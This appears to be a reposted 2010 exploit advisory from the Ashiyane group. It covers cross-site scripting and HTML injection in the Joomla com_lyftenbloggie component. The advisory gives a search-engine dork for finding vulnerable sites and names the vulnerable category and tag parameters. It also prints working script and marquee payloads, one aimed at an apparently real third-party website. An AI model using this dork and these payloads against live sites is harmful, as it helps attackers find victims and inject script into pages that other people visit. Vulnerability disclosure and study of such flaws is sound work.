Home / os / win7

Joomla Lyftenbloggie Cross Site Scripting

Posted on 17 December 2010


####################################################################
# Joomla Component (com_lyftenbloggie) XSS/HTML Vulnerability       #
####################################################################
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
______           __
/  _           /       __
  L     ____  \___ /\_  __  __     __      ___      __
   __   /',__\   _ `/ / /   /'__`  /' _ `  /'__`\n  / /\__, `\        \_ / L.\_/ / /  __/
 \_ \_/\____/  \_ \_ \_/`____  \__/.\_ \_ \_ \____\n/_//_//___/   /_//_//_/`/___/> /__//_//_//_//____/
/\___/
/__/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
####################################################################
# Name: Joomla Component (com_lyftenbloggie) XSS/HTML Vulnerability

# Vendor: http://www.lyften.com/products/lyften-bloggie.html

# Date: 2010-12-16

# Author: Ashiyane Digital Security Team

# Contact: XroGuE ~> Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com

# Home: www.Ashiyane.org/forums/

# Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members !

####################################################################

[+] Dork: inurl:"index.php?option=com_lyftenbloggie"

####################################################################

[+] vuln: http://127.0.0.1/index.php?option=com_lyftenbloggie&category=[XSS/HTML]
[+] vuln: http://127.0.0.1/index.php?option=com_lyftenbloggie&tag=[XSS/HTML]


[+] XSS: http://www.nastel.com/index.php?option=com_lyftenbloggie&tag=<script>var XroG= String.fromCharCode(88, 114, 111, 71, 117, 69);alert(XroG)</script>


[+] HTML: http://www.nastel.com/index.php?option=com_lyftenbloggie&tag=<marquee><font color=Blue size=15>XroGuE</font></marquee>

####################################################################

 

TOP

Malware :

Exploits :